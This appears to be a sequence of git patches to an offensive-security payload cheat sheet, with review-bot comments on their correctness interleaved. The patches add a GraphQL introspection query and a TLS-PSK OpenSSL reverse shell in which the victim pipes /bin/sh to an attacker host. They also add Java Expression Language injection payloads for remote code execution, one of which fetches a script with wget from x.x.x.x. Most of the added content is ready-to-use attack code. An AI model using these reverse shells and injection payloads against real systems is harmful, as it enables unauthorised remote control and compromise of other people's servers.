@@ -156,6 +156,12 @@ query IntrospectionQuery { } ``` +Single line query to dump the database schema without fragments. + +```js +__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}} +``` + ### List path ```php From 2d7d6d6eed40f4a8d02e155a84b5671267459625 Mon Sep 17 00:00:00 2001 From: Artiom Mocrenco Date: Wed, 8 Jul 2020 17:01:38 +0300 Subject: [PATCH 83/85] Add TLS-PSK OpenSSL reverse shell method --- Methodology and Resources/Reverse Shell Cheatsheet.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 0362a8a..4384d00 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md 
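Review bot: As written the line is a selection set, not a complete operation: `__schema{...}` has to be wrapped in `{ ... }` (or `query { ... }`) before a server will accept it, so either add the braces or say that the caller must add them. Two smaller points: GraphQL introspection returns the API schema, not the "database schema", and the fence is tagged ```js while the content is GraphQL (```graphql).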
@@ -175,6 +175,17 @@ user@attack$ ncat --ssl -vv -l -p 4242 user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s ``` +TLS-PSK (does not rely on PKI or self-signed certificates) +```bash +# generate 48-bit PSK +# use the generated string as a value for the two PSK variables from below +openssl rand -hex 48 +# server (attacker) +export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT +# client (victim) +export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE +``` + ### Powershell ```powershell From 62443a37538fb5012f359e9c96e95de913ffe6e2 Mon Sep 17 00:00:00 2001 From: Artiom Mocrenco Date: Wed, 8 Jul 2020 18:01:12 +0300 Subject: [PATCH 84/85] fix typo --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 4384d00..2617724 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -177,7 +177,7 @@ user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet - TLS-PSK (does not rely on PKI or self-signed certificates) ```bash -# generate 48-bit PSK +# generate 384-bit PSK # use the generated string as a value for the two PSK variables from below openssl rand -hex 48 # server (attacker) From 2c935df34da62b8af21ccc3eafb3f52160610019 Mon Sep 17 00:00:00 2001 
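Review bot: The comment `# generate 48-bit PSK` is wrong: `openssl rand -hex 48` produces 48 random bytes, i.e. a 384-bit key (96 hex characters). Two caveats deserve a line of text: passing the key with `-psk $PSK` puts it on the command line, where it is visible to any local user via `ps` and to process-auditing tools on both hosts, and `-tls1_2` is not optional, because the PSK-* names in `-cipher` are TLS 1.2 cipher suites (TLS 1.3 negotiates PSKs differently), so the text should say the connection is deliberately pinned to TLS 1.2.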
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 10 Jul 2020 15:05:13 +0200 Subject: [PATCH 85/85] EL Injection - SSTI --- Server Side Template Injection/README.md | 49 +++++++++++++++++++++++- 1 file changed, 48 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index eb78c9d..2f88b82 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -14,6 +14,9 @@ * [Basic injection](#basic-injection) * [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables) * [Retrieve /etc/passwd](#retrieve--etc-passwd) +* [Expression Language EL](#expression-language-el) + * [Basic injection](#basic-injection) + * [Code execution](#code-execution) * [Twig](#twig) * [Basic injection](#basic-injection) * [Template format](#template-format) @@ -97,7 +100,7 @@ Execute code using SSTI for ERB engine. <%= system('cat /etc/passwd') %> <%= `ls /` %> <%= IO.popen('ls /').readlines() %> -<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> +<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> ``` 
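Review bot: The two new TOC entries reuse `#basic-injection` and `#code-execution`, anchors already used by other engine sections in this file (ERB, Twig, ...), so all of them jump to the first heading with that name; GitHub numbers duplicate anchors (`#basic-injection-1`, ...), so either use the numbered anchors or make the headings unique ("EL - Basic injection"). The unchanged context line just above, `[Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)`, is also missing its leading `#`.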
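Review bot: The removed and added `<% require 'open3' %>` lines render identically, so the change is invisible in the diff (most likely trailing whitespace or a non-ASCII character), and the commit message "EL Injection - SSTI" does not mention it. Say what was fixed, or keep this unrelated whitespace change out of the EL commit.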
@@ -134,6 +137,47 @@ ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} ``` +## Expression Language EL + +### Basic injection + +```java +${1+1} +#{1+1} +``` + +### Code Execution + + +```java +// Common RCE payloads +''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec() +''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance().start() + +// Method using Runtime +#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])} +#{session.getAttribute("rtc").setAccessible(true)} +#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")} + +// Method using processbuilder +${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())} +${request.getAttribute("c").add("cmd.exe")} +${request.getAttribute("c").add("/k")} +${request.getAttribute("c").add("ping x.x.x.x")} +${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} +${request.getAttribute("a")} + +// Method using Reflection & Invoke 
+${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")} + +// Method using ScriptEngineManager one-liner +${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))} + +// Method using ScriptEngineManager +${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} +``` + + ## Twig ### Basic injection @@ -464,3 +508,6 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) * [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) * [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) +* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection) +* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) +* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) \ No newline at end of file
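Review bot: The "ScriptEngineManager one-liner" has an unbalanced parenthesis: after `.eval("...")` there is one `)` too many before the closing `}`, so the expression as printed will not parse. The last payload also carries `\"` escapes at the top level of the expression, which only make sense when the whole payload is itself embedded in a quoted string; state which context is meant or unescape it. Two fragility caveats belong in the comments: `getMethods()[6]` and `getDeclaredConstructors()[1]` rely on the reflection order of the running JVM, which the Java specification does not guarantee, and the two entries both titled "Method using ScriptEngineManager" should be told apart (one-liner vs. response-header variant). Minor: the heading reads "Code Execution" while the TOC says "Code execution", and there is a double blank line after it.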
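Review bot: The file now ends without a trailing newline ("\ No newline at end of file"); add one so the next appended reference does not produce a noisy diff on this line. Also "Github Security Lab" should be "GitHub Security Lab" to match the project's own spelling.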